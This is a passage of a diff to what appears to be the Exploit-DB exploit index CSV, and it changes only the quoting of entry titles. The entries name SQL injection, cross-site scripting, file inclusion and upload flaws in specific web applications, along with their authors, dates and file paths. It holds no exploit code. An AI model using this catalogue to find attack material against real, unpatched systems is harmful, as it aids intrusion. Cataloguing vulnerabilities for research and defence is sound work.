Vulnerabilities",2013-09-06,SANTHO,php,webapps,80 @@ -23992,7 +23993,7 @@ id,file,description,date,author,platform,type,port 12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Arbitrary File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 12700,platforms/asp/webapps/12700.txt,"DotNetNuke - Arbitrary File Upload",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0 12701,platforms/asp/webapps/12701.txt,"Rave Creations/UHM - 'artists.asp' SQL Injection",2010-05-22,Ra3cH,asp,webapps,0 -12702,platforms/php/webapps/12702.php,"ECShop - search.php SQL Injection",2010-05-22,Jannock,php,webapps,0 +12702,platforms/php/webapps/12702.php,"ECShop - 'search.php' SQL Injection",2010-05-22,Jannock,php,webapps,0 12703,platforms/php/webapps/12703.txt,"Recipes Website 1.0 - SQL Injection",2010-05-22,Mr.ThieF,php,webapps,0 12706,platforms/php/webapps/12706.txt,"MMA Creative Design - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12707,platforms/php/webapps/12707.txt,"runt-communications Design - SQL Injection",2010-05-23,XroGuE,php,webapps,0 @@ -24031,7 +24032,7 @@ id,file,description,date,author,platform,type,port 12750,platforms/windows/webapps/12750.txt,"RapidWareX 2.0.1 - (WebUI) Cross-Site Request Forgery",2010-05-26,l3D,windows,webapps,0 12754,platforms/php/webapps/12754.html,"Easy Address book WebServer 1.2 - Cross-Site Request Forgery",2010-05-26,Markot,php,webapps,0 12755,platforms/php/webapps/12755.txt,"Multi Vendor Mall - 'itemdetail.php & shop.php' SQL Injection",2010-05-26,CoBRa_21,php,webapps,0 -12756,platforms/php/webapps/12756.txt,"Spaceacre - 'index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,php,webapps,0 +12756,platforms/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,php,webapps,0 12761,platforms/php/webapps/12761.txt,"GlobalWebTek Design - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12763,platforms/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,php,webapps,0 12766,platforms/php/webapps/12766.txt,"PPhlogger 2.2.5 - 'trace.php' Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 @@ -24141,8 +24142,8 @@ id,file,description,date,author,platform,type,port 13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",asp,webapps,0 13794,platforms/multiple/webapps/13794.txt,"Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0 27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload / Script Execution",2006-06-05,Kil13r,php,webapps,0 -27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - 'inc/dbase.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 -27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - 'inc/config.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - '/inc/dbase.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - '/inc/config.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 13796,platforms/php/webapps/13796.txt,"Joomla! Component com_jstore - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 13797,platforms/php/webapps/13797.txt,"Joomla! Component com_jtickets - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 13798,platforms/php/webapps/13798.txt,"Joomla! Component com_jcommunity - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 @@ -24554,7 +24555,7 @@ id,file,description,date,author,platform,type,port 14518,platforms/php/webapps/14518.txt,"Joomla! Component com_spielothek 1.6.9 - Multiple Blind SQL Injections",2010-07-31,"Salvatore Fresta",php,webapps,0 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,hardware,webapps,0 14523,platforms/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat' SQL Injection",2010-08-02,CoBRa_21,php,webapps,0 -14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM - modules.php SQL Injection",2010-08-02,secret,php,webapps,0 +14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM - 'modules.php' SQL Injection",2010-08-02,secret,php,webapps,0 14530,platforms/php/webapps/14530.txt,"Joomla! Component CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0 14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0 @@ -24572,7 +24573,7 @@ id,file,description,date,author,platform,type,port 14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14570,platforms/php/webapps/14570.txt,"Joomla! Component NeoRecruit 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps,0 -14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - Statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0 +14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - 'Statistics.php' SQL Injection",2010-08-08,garwga,php,webapps,0 14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps,0 14598,platforms/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injections",2010-08-10,"Salvatore Fresta",php,webapps,0 14589,platforms/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,php,webapps,0 @@ -24660,7 +24661,7 @@ id,file,description,date,author,platform,type,port 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 - 'addcomment.php' Persistent Cross-Site Scripting",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",2010-09-04,"BorN To K!LL",php,webapps,0 14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0 -14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - 'sources/search.php' SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0 +14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - '/sources/search.php' SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0 14896,platforms/php/webapps/14896.txt,"Joomla! Component iJoomla Magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0 14897,platforms/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,AmnPardaz,php,webapps,0 14898,platforms/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities",2010-09-05,Abysssec,asp,webapps,0 @@ -24760,7 +24761,7 @@ id,file,description,date,author,platform,type,port 15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Vulnerabilities",2010-09-28,"Pablo Milano",php,webapps,0 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent Cross-Site Scripting",2010-09-28,"SecPod Research",php,webapps,0 -15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 - asearch.php SQL Injection",2010-09-29,"silent vapor",php,webapps,0 +15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 - 'asearch.php' SQL Injection",2010-09-29,"silent vapor",php,webapps,0 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net - static Blind SQL Injection",2010-09-29,"Easy Laster",php,webapps,0 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0 15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0 @@ -24857,8 +24858,8 @@ id,file,description,date,author,platform,type,port 15343,platforms/php/webapps/15343.php,"RoSPORA 1.5.0 - Remote PHP Code Injection",2010-10-28,EgiX,php,webapps,0 15345,platforms/php/webapps/15345.txt,"TFTgallery 0.13.1 - Local File Inclusion",2010-10-28,Havok,php,webapps,0 15348,platforms/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps,0 -15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0 -15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0 +15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - 'overview.php' SQL Injection",2010-10-29,"Easy Laster",php,webapps,0 +15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - 'game.php' SQL Injection",2010-10-29,"Easy Laster",php,webapps,0 15353,platforms/php/webapps/15353.txt,"Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0 15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1/0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,php,webapps,0 15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0 @@ -25144,7 +25145,7 @@ id,file,description,date,author,platform,type,port 15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 - HTTP Referer Persistent Cross-Site Scripting",2011-01-12,"Saif El-Sherei",php,webapps,0 15979,platforms/php/webapps/15979.txt,"Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0 -16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0 +16020,platforms/php/webapps/16020.txt,"PHP Lowbids - 'viewfaqs.php' Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0 15989,platforms/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0 15993,platforms/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0 15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0 @@ -25774,7 +25775,7 @@ id,file,description,date,author,platform,type,port 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0 17944,platforms/php/webapps/17944.txt,"Joomla! Component Time Returns 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0 -17947,platforms/php/webapps/17947.rb,"Snortreport - 'nmap.php' / 'nbtscan.php' Remote Command Execution (Metasploit)",2011-10-09,Metasploit,php,webapps,0 +17947,platforms/php/webapps/17947.rb,"Snortreport - '/nmap.php' / 'nbtscan.php' Remote Command Execution (Metasploit)",2011-10-09,Metasploit,php,webapps,0 17949,platforms/php/webapps/17949.rb,"MyBB 1.6.4 - Backdoor (Metasploit)",2011-10-09,Metasploit,php,webapps,0 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection Vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 @@ -25952,8 +25953,8 @@ id,file,description,date,author,platform,type,port 18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XXE Injection (Metasploit)",2012-01-14,"Marco Batista",php,webapps,0 18380,platforms/php/webapps/18380.txt,"Joomla! Component com_discussions - SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0 18975,platforms/php/webapps/18975.rb,"Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit)",2012-06-03,Metasploit,php,webapps,0 -18383,platforms/php/webapps/18383.txt,"pGB 2.12 - kommentar.php SQL Injection",2012-01-18,3spi0n,php,webapps,0 -18384,platforms/php/webapps/18384.txt,"PHPBridges Blog System - members.php SQL Injection",2012-01-18,3spi0n,php,webapps,0 +18383,platforms/php/webapps/18383.txt,"pGB 2.12 - 'kommentar.php' SQL Injection",2012-01-18,3spi0n,php,webapps,0 +18384,platforms/php/webapps/18384.txt,"PHPBridges Blog System - 'members.php' SQL Injection",2012-01-18,3spi0n,php,webapps,0 18385,platforms/php/webapps/18385.txt,"DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 18386,platforms/php/webapps/18386.txt,"DZCP (deV!L_z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 18389,platforms/php/webapps/18389.txt,"Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting",2012-01-19,MaXe,php,webapps,0 @@ -26139,7 +26140,7 @@ id,file,description,date,author,platform,type,port 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injections",2012-05-01,Vulnerability-Lab,php,webapps,0 18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 18815,platforms/php/webapps/18815.txt,"STRATO NewsLetter Manager - Directory Traversal",2012-05-01,"Zero X",php,webapps,0 -18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - 'author/edit.php' Blind SQL Injection",2012-05-02,EgiX,php,webapps,0 +18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - '/author/edit.php' Blind SQL Injection",2012-05-02,EgiX,php,webapps,0 18824,platforms/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 18822,platforms/php/webapps/18822.txt,"PHP-decoda - 'Video Tag' Cross-Site Scripting",2012-05-02,"RedTeam Pentesting",php,webapps,0 18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0 @@ -26471,7 +26472,7 @@ id,file,description,date,author,platform,type,port 21052,platforms/jsp/webapps/21052.txt,"jira 4.4.3 / greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 21053,platforms/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection",2012-09-04,L0n3ly-H34rT,php,webapps,0 -21056,platforms/php/webapps/21056.txt,"Group Office Calendar - 'calendar/json.php' SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 +21056,platforms/php/webapps/21056.txt,"Group Office Calendar - '/calendar/json.php' SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 21065,platforms/php/webapps/21065.pl,"phpBB 1.x - Page Header Arbitrary Command Execution",2001-07-31,UnderSpell,php,webapps,0 21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File Creation (Metasploit)",2012-09-05,Metasploit,php,webapps,0 21081,platforms/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP - Multiple Path Injections",2012-09-05,"Andrea Fabrizi",hardware,webapps,0 @@ -26510,7 +26511,7 @@ id,file,description,date,author,platform,type,port 21272,platforms/asp/webapps/21272.txt,"Knowledge Base Enterprise Edition 4.62.00 - SQL Injection",2012-09-12,Vulnerability-Lab,asp,webapps,0 21273,platforms/php/webapps/21273.txt,"Ezylog Photovoltaic Management Server - Multiple Vulnerabilities",2012-09-12,"Roberto Paleari",php,webapps,0 21277,platforms/php/webapps/21277.txt,"Portix-PHP 0.4 - 'index.php' Directory Traversal",2002-02-04,frog,php,webapps,0 -21278,platforms/php/webapps/21278.txt,"Portix-PHP 0.4 - view.php Directory Traversal",2002-02-04,frog,php,webapps,0 +21278,platforms/php/webapps/21278.txt,"Portix-PHP 0.4 - 'view.php' Directory Traversal",2002-02-04,frog,php,webapps,0 21279,platforms/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie Manipulation",2002-02-04,frog,php,webapps,0 40416,platforms/php/webapps/40416.txt,"Matrimonial Website Script 1.0.2 - SQL Injection",2016-09-22,N4TuraL,php,webapps,80 21299,platforms/php/webapps/21299.txt,"Powie PForum 1.1x - 'Username' Cross-Site Scripting",2002-02-22,"Jens Liebchen",php,webapps,0 @@ -26523,7 +26524,7 @@ id,file,description,date,author,platform,type,port 21319,platforms/aix/webapps/21319.txt,"Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2012-09-14,modpr0be,aix,webapps,0 22073,platforms/php/webapps/22073.txt,"APBoard 2.0 2 - Unauthorized Thread Reading",2002-12-06,"DNA ESC",php,webapps,0 21324,platforms/php/webapps/21324.txt,"luxcal 2.7.0 - Multiple Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps,0 -21327,platforms/php/webapps/21327.txt,"webERP 4.08.4 - WorkOrderEntry.php SQL Injection",2012-09-17,modpr0be,php,webapps,0 +21327,platforms/php/webapps/21327.txt,"webERP 4.08.4 - 'WorkOrderEntry.php' SQL Injection",2012-09-17,modpr0be,php,webapps,0 21329,platforms/php/webapps/21329.txt,"Auxilium PetRatePro - Multiple Vulnerabilities",2012-09-17,DaOne,php,webapps,0 21330,platforms/php/webapps/21330.txt,"Netsweeper WebAdmin Portal - Multiple Vulnerabilities",2012-09-17,"Jacob Holcomb",php,webapps,0 21343,platforms/php/webapps/21343.txt,"PHProjekt 3.1 - Remote File Inclusion",2002-03-13,b0iler,php,webapps,0 @@ -26674,12 +26675,12 @@ id,file,description,date,author,platform,type,port 21859,platforms/php/webapps/21859.txt,"PHP-Nuke 6.0 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 21860,platforms/php/webapps/21860.txt,"NPDS 4.8 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 21861,platforms/php/webapps/21861.txt,"DaCode 1.2 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 -21862,platforms/php/webapps/21862.txt,"PHP-Nuke 6.0 - modules.php SQL Injection",2002-09-25,"Pedro Inacio",php,webapps,0 +21862,platforms/php/webapps/21862.txt,"PHP-Nuke 6.0 - 'modules.php' SQL Injection",2002-09-25,"Pedro Inacio",php,webapps,0 21863,platforms/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 21864,platforms/php/webapps/21864.txt,"phpWebSite 0.8.3 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12/9.0.14 - Persistent Cross-Site Scripting",2012-10-10,loneferret,multiple,webapps,0 21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 -21873,platforms/php/webapps/21873.txt,"PostNuke 0.72 - modules.php Cross-Site Scripting",2002-09-26,"Mark Grimes",php,webapps,0 +21873,platforms/php/webapps/21873.txt,"PostNuke 0.72 - 'modules.php' Cross-Site Scripting",2002-09-26,"Mark Grimes",php,webapps,0 21874,platforms/php/webapps/21874.txt,"vBulletin 2.0.3 - calendar.php Command Execution",2002-09-27,gosper,php,webapps,0 21875,platforms/jsp/webapps/21875.txt,"Jetty 4.1 Servlet Engine - Cross-Site Scripting",2002-09-28,Skinnay,jsp,webapps,0 21877,platforms/cgi/webapps/21877.txt,"EmuMail 5.0 - Web Root Full Path Disclosure",2002-09-29,FVS,cgi,webapps,0 @@ -26690,7 +26691,7 @@ id,file,description,date,author,platform,type,port 21894,platforms/php/webapps/21894.txt,"Midicart PHP - Information Disclosure",2002-10-02,frog,php,webapps,0 21895,platforms/cgi/webapps/21895.txt,"Jetty 3.1.6/3.1.7/4.1 Servlet Engine - Arbitrary Command Execution",2002-10-02,"Matt Moore",cgi,webapps,0 21896,platforms/php/webapps/21896.txt,"Midicart PHP - Arbitrary File Upload",2002-10-02,frog,php,webapps,0 -21899,platforms/php/webapps/21899.txt,"phpWebSite 0.8.3 - article.php Cross-Site Scripting",2002-10-02,Sp.IC,php,webapps,0 +21899,platforms/php/webapps/21899.txt,"phpWebSite 0.8.3 - 'article.php' Cross-Site Scripting",2002-10-02,Sp.IC,php,webapps,0 21900,platforms/php/webapps/21900.txt,"MySimpleNews 1.0 - PHP Injection",2002-10-02,frog,php,webapps,0 21901,platforms/php/webapps/21901.txt,"MySimpleNews 1.0 - Remotely Readable Administrator Password",2002-10-02,frog,php,webapps,0 21903,platforms/php/webapps/21903.txt,"Michael Schatz Books 0.54/0.6 PostNuke Module - Cross-Site Scripting",2002-10-03,Pistone,php,webapps,0 @@ -26721,7 +26722,7 @@ id,file,description,date,author,platform,type,port 21969,platforms/php/webapps/21969.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'index.php' subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 21970,platforms/php/webapps/21970.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'newtopic.php' subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 21976,platforms/php/webapps/21976.txt,"Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Inclusion",2002-11-01,"Karol Wiesek",php,webapps,0 -21977,platforms/php/webapps/21977.txt,"PHP-Nuke 5.6 - modules.php SQL Injection",2002-11-01,kill9,php,webapps,0 +21977,platforms/php/webapps/21977.txt,"PHP-Nuke 5.6 - 'modules.php' SQL Injection",2002-11-01,kill9,php,webapps,0 21979,platforms/cgi/webapps/21979.txt,"ION Script 1.4 - Remote File Disclosure",2002-11-01,"Zero X",cgi,webapps,0 21989,platforms/php/webapps/21989.txt,"Cartweaver 3 - Local File Inclusion",2012-10-15,HaxOr,php,webapps,0 21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 - 'readfile()' Disclosure / SQL Injection",2012-10-15,pennyGrit,php,webapps,0 @@ -26733,13 +26734,13 @@ id,file,description,date,author,platform,type,port 22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0 22015,platforms/cgi/webapps/22015.txt,"W3Mail 1.0.6 - File Disclosure",2002-11-12,"Tim Brown",cgi,webapps,0 22017,platforms/php/webapps/22017.txt,"phpBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion",2002-11-13,"Hai Nam Luke",php,webapps,0 -22030,platforms/php/webapps/22030.php,"vBulletin 2.0/2.2.x - memberlist.php Cross-Site Scripting",2002-11-22,Sp.IC,php,webapps,0 +22030,platforms/php/webapps/22030.php,"vBulletin 2.0/2.2.x - 'memberlist.php' Cross-Site Scripting",2002-11-22,Sp.IC,php,webapps,0 22037,platforms/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",php,webapps,0 22038,platforms/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,cr4wl3r,php,webapps,0 22039,platforms/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0 22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0 -22042,platforms/php/webapps/22042.php,"vBulletin 2.0.x/2.2.x - members2.php Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps,0 +22042,platforms/php/webapps/22042.php,"vBulletin 2.0.x/2.2.x - 'members2.php' Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps,0 22043,platforms/php/webapps/22043.txt,"phpBB 2.0.3 - Script Injection",2002-11-25,"Pete Foster",php,webapps,0 22044,platforms/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Inclusion",2002-11-25,frog,php,webapps,0 22045,platforms/cgi/webapps/22045.txt,"Working Resources BadBlue 1.7.1 - Search Page Cross-Site Scripting",2002-11-25,"Matthew Murphy",cgi,webapps,0 @@ -26748,11 +26749,11 @@ id,file,description,date,author,platform,type,port 22050,platforms/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - imageFolio.cgi direct Parameter Cross-Site Scripting",2002-11-27,SecurityTracker.com,cgi,webapps,0 22051,platforms/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - nph-build.cgi Cross-Site Scripting",2002-11-27,SecurityTracker.com,cgi,webapps,0 22052,platforms/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",cgi,webapps,0 -22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 - search.php Cross-Site Scripting",2002-12-03,f_a_a,php,webapps,0 +22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 - 'search.php' Cross-Site Scripting",2002-12-03,f_a_a,php,webapps,0 22070,platforms/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final Beta - viewtopic.php Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 -22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final Beta - viewtopic.php Cross-Site Scripting",2002-11-08,euronymous,php,webapps,0 +22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final Beta - 'viewtopic.php' Cross-Site Scripting",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 - HTML Injection",2002-11-09,"Dorin Balanica",php,webapps,0 22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0 22083,platforms/php/webapps/22083.txt,"Deerfield VisNetic WebSite 3.5.13.1 - Cross-Site Scripting",2002-12-12,"Ory Segal",php,webapps,0 @@ -26768,9 +26769,9 @@ id,file,description,date,author,platform,type,port 22102,platforms/php/webapps/22102.txt,"PHP-Nuke 6.0 - Multiple Full Path Disclosure Vulnerabilities",2002-12-16,frog,php,webapps,0 22103,platforms/php/webapps/22103.txt,"PHP-Nuke 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2002-12-16,frog,php,webapps,0 22104,platforms/php/webapps/22104.txt,"Captaris Infinite WebMail 3.61.5 - HTML Injection",2002-12-16,"Pedram Amini",php,webapps,0 -22107,platforms/php/webapps/22107.txt,"SPGPartenaires 3.0.1 - ident.php SQL Injection",2002-12-20,frog,php,webapps,0 -22108,platforms/php/webapps/22108.txt,"SPGPartenaires 3.0.1 - delete.php SQL Injection",2002-12-20,frog,php,webapps,0 -22109,platforms/php/webapps/22109.txt,"W-Agora 4.1.6 - EditForm.php Cross-Site Scripting",2002-12-22,xatr0z,php,webapps,0 +22107,platforms/php/webapps/22107.txt,"SPGPartenaires 3.0.1 - 'ident.php' SQL Injection",2002-12-20,frog,php,webapps,0 +22108,platforms/php/webapps/22108.txt,"SPGPartenaires 3.0.1 - 'delete.php' SQL Injection",2002-12-20,frog,php,webapps,0 +22109,platforms/php/webapps/22109.txt,"W-Agora 4.1.6 - 'EditForm.php' Cross-Site Scripting",2002-12-22,xatr0z,php,webapps,0 22111,platforms/cgi/webapps/22111.pl,"CHETCPASSWD 1.12 - Shadow File Disclosure",2002-12-22,"Victor Pereira",cgi,webapps,0 22114,platforms/php/webapps/22114.txt,"PEEL 1.0b - Remote File Inclusion",2002-12-31,frog,php,webapps,0 22115,platforms/php/webapps/22115.txt,"N/X Web Content Management System 2002 Prerelease 1 - 'menu.inc.php?c_path' Remote File Inclusion",2003-01-02,frog,php,webapps,0 @@ -26781,8 +26782,8 @@ id,file,description,date,author,platform,type,port 22133,platforms/php/webapps/22133.txt,"myPHPNuke 1.8.8 - 'Default_Theme' Cross-Site 